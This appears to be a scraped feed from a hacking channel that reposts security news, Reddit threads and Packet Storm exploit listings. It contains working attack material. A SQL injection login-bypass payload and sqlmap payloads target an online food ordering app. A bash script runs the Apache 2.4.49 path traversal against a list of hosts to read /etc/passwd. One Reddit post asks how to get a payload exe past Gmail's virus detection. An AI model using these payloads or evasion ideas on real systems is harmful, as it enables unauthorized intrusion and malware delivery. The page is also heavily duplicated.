Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online-Food-Ordering-Web-App SQL Injection
https://1.bp.blogspot.com/-HlvbbOwsdTc/WWlvV_wSsQI/AAAAAAAAIOA/psrlTyexNtUDdre2JEY7YvqsGP1V8LJKQCLcBGAs/s1600/h47.png
Online-Food-Ordering-Web-App suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Online-Food-Ordering-Web-App SQL Injection
https://1.bp.blogspot.com/-HlvbbOwsdTc/WWlvV_wSsQI/AAAAAAAAIOA/psrlTyexNtUDdre2JEY7YvqsGP1V8LJKQCLcBGAs/s1600/h47.png
Online-Food-Ordering-Web-App suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
2e3935af30a88b048926ba5e206dad5aDownload
CVE-2021-41647 SQL Injection in Online-Food-Ordering-Web-App
The Online-Food-Ordering-Web-App is vulnerable to un-authenticated error and time-based blind SQL Injection attacks. The username parameter on the /login.php page does not sanitize the user input, an attacker is able to bypass the login using a simple bypass technique.
Link To Application
Online-Food-Ordering-Web-App
Affected Components & Parameter
URL: /login.php
PARAMETER: username
POC'S
LOGIN BYPASS PAYLOAD
To bypass the user login and gain full administrative access, payload in the username input field: user' or 1=1-- -
SQLMAP PAYLOADS
Parameter: username (POST Request) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf
Discovered by
Jason Colyvas
MOBIUSBINARY
September 20th, 2021
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online-Food-Ordering-Web-App SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Apache HTTP Server 2.4.49 Path Traversal
https://2.bp.blogspot.com/-QZ2Sf2sxziM/WWlvZhEG73I/AAAAAAAAIO0/d0s8s4TXkHwnfXzbpubNEBqDxa568NQgwCLcBGAs/s1600/h60.png
Apache HTTP Server version 2.4.49 suffers from a path traversal vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Apache HTTP Server 2.4.49 Path Traversal
https://2.bp.blogspot.com/-QZ2Sf2sxziM/WWlvZhEG73I/AAAAAAAAIO0/d0s8s4TXkHwnfXzbpubNEBqDxa568NQgwCLcBGAs/s1600/h60.png
Apache HTTP Server version 2.4.49 suffers from a path traversal vulnerability.
MD5 |
1f8f44361142a2acbf7b9f53b654f29aDownload
# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage: https://apache.org/
# Version: 2.4.49
# Tested on: 2.4.49
# CVE : CVE-2021-41773
# Credits: Ash Daulton and the cPanel Security Team
#!/bin/bash
if [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH]
echo ./PoC.sh targets.txt /etc/passwd
exit
fi
for host in $(cat $1); do
curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Apache HTTP Server 2.4.49 Path Traversal
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Reverse engineering and decrypting CyberArk vault credential files
https://www.reddit.com/r/redteamsec/comments/q2p3y6/reverse_engineering_and_decrypting_cyberark_vault/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://jellevergeer.com/reverse-engineering-and-decrypting-cyberark-vault-credential-files/) [comments] (https://www.reddit.com/r/redteamsec/comments/q2p3y6/reverse_engineering_and_decrypting_cyberark_vault/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/q2p3y6/reverse_engineering_and_decrypting_cyberark_vault/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://jellevergeer.com/reverse-engineering-and-decrypting-cyberark-vault-credential-files/) [comments] (https://www.reddit.com/r/redteamsec/comments/q2p3y6/reverse_engineering_and_decrypting_cyberark_vault/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Reverse engineering and decrypting CyberArk vault credential files
Posted in r/redteamsec by u/dmchell • 2 points and 0 comments
Dark Reading: Attacks/Breaches
Optiv Rebrands as Cyber Advisory & Solutions Leader
Optiv announced it will create a new market category to protect business value and accelerate performance.
___________________________
@hacking_Attack
@Hacking_Video
Optiv Rebrands as Cyber Advisory & Solutions Leader
Optiv announced it will create a new market category to protect business value and accelerate performance.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Optiv Rebrands as Cyber Advisory & Solutions Leader
Optiv announced it will create a new market category to protect business value and accelerate performance.
Dark Reading: Attacks/Breaches
Why Not Sharing Is Caring When It Comes to Cybersecurity
Three key tips to help ensure your employees keep vital information safe.
___________________________
@hacking_Attack
@Hacking_Video
Why Not Sharing Is Caring When It Comes to Cybersecurity
Three key tips to help ensure your employees keep vital information safe.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Why Not Sharing Is Caring When It Comes to Cybersecurity
Three key tips to help ensure your employees keep vital information safe.
Dark Reading: Attacks/Breaches
Amazon's Twitch Streaming Service Hacked, Sensitive Data Leaked
Attackers claim to have dumped Twitch source code, payment information, and unreleased gaming product plan online.
___________________________
@hacking_Attack
@Hacking_Video
Amazon's Twitch Streaming Service Hacked, Sensitive Data Leaked
Attackers claim to have dumped Twitch source code, payment information, and unreleased gaming product plan online.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Amazon's Twitch Streaming Service Hacked, Sensitive Data Leaked
Attackers claim to have dumped Twitch source code, payment information, and unreleased gaming product plan online.
The #1 Cybersecurity Course on Udemy (2021)
https://www.reddit.com/r/Pentesting/comments/q2nra9/the_1_cybersecurity_course_on_udemy_2021/
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/q2nra9/the_1_cybersecurity_course_on_udemy_2021/
___________________________
@hacking_Attack
@Hacking_Video
reddit
The #1 Cybersecurity Course on Udemy (2021)
Posted in r/Pentesting by u/Jan_Prince • 0 points and 1 comment
submitted by /u/Jan_Prince (https://www.reddit.com/user/Jan_Prince)
[link] (https://www.pythonstacks.com/blog/post/cybersecurity-course-udemy/) [comments] (https://www.reddit.com/r/Pentesting/comments/q2nra9/the_1_cybersecurity_course_on_udemy_2021/)
___________________________
@hacking_Attack
@Hacking_Video
[link] (https://www.pythonstacks.com/blog/post/cybersecurity-course-udemy/) [comments] (https://www.reddit.com/r/Pentesting/comments/q2nra9/the_1_cybersecurity_course_on_udemy_2021/)
___________________________
@hacking_Attack
@Hacking_Video
Reddit
overview for Jan_Prince
The u/Jan_Prince community on Reddit. Reddit gives you the best of the internet in one place.
Bug’s types, testing, impact and an AWESOME tool.
Recently, I took part in BugéDex , a bug-hunting competition organized by the folks over at CSI-VIT & CloudSEK, where we learned about…Continue reading on Medium »
Read more...
Recently, I took part in BugéDex , a bug-hunting competition organized by the folks over at CSI-VIT & CloudSEK, where we learned about…Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Twitch Hacked, Entirety Leaked on 4Chan
https://external-preview.redd.it/7nkgK75ZQRaczeuAOqfIAJesNf16oKXSOwrIOJQ0v7g.jpg?width=320&crop=smart&auto=webp&s=be089e78ef3f60b5047247bcb6a4169c6f628ce9 submitted by /u/About500Ronin
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Twitch Hacked, Entirety Leaked on 4Chan
https://external-preview.redd.it/7nkgK75ZQRaczeuAOqfIAJesNf16oKXSOwrIOJQ0v7g.jpg?width=320&crop=smart&auto=webp&s=be089e78ef3f60b5047247bcb6a4169c6f628ce9 submitted by /u/About500Ronin
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Twitch Hacked, Entirety Leaked on 4Chan
Posted in r/hacking by u/About500Ronin • 437 points and 94 comments
hacking: security in practice
payload converted to exe
how do i attach that exe to a gmail message without it being detected as a virus. what other way is there to send this. i thought of google drive and sending a link but it gives the same prompt.
submitted by /u/ball-sack-patato
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
payload converted to exe
how do i attach that exe to a gmail message without it being detected as a virus. what other way is there to send this. i thought of google drive and sending a link but it gives the same prompt.
submitted by /u/ball-sack-patato
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
payload converted to exe
how do i attach that exe to a gmail message without it being detected as a virus. what other way is there to send this. i thought of google drive...
Bug’s types, testing, impact and an AWESOME tool.
https://medium.com/@sarthak28200111/bugs-types-testing-impact-and-an-awesome-tool-cd55da50f217?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@sarthak28200111/bugs-types-testing-impact-and-an-awesome-tool-cd55da50f217?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bug’s types, testing, impact and an AWESOME tool.
Recently, I took part in BugéDex , a bug-hunting competition organized by the folks over at CSI-VIT & CloudSEK, where we learned about…
Recently, I took part in BugéDex , a bug-hunting competition organized by the folks over at CSI-VIT & CloudSEK, where we learned about…Continue reading on Medium » (https://medium.com/@sarthak28200111/bugs-types-testing-impact-and-an-awesome-tool-cd55da50f217?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bug’s types, testing, impact and an AWESOME tool.
Recently, I took part in BugéDex , a bug-hunting competition organized by the folks over at CSI-VIT & CloudSEK, where we learned about…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Free Fire Diamond hack generator without human verification 2021
https://cdn-images-1.medium.com/max/1280/1*YvCGo6aUwZYN8nXW4Nx0Jw.jpeg
If you are in need of a free fire diamond hack generator, then this article was written with you in mind.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Free Fire Diamond hack generator without human verification 2021
https://cdn-images-1.medium.com/max/1280/1*YvCGo6aUwZYN8nXW4Nx0Jw.jpeg
If you are in need of a free fire diamond hack generator, then this article was written with you in mind.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Free Fire Diamond hack generator without human verification 2021
If you are in need of a free fire diamond hack generator, then this article was written with you in mind. We are going to discuss what this…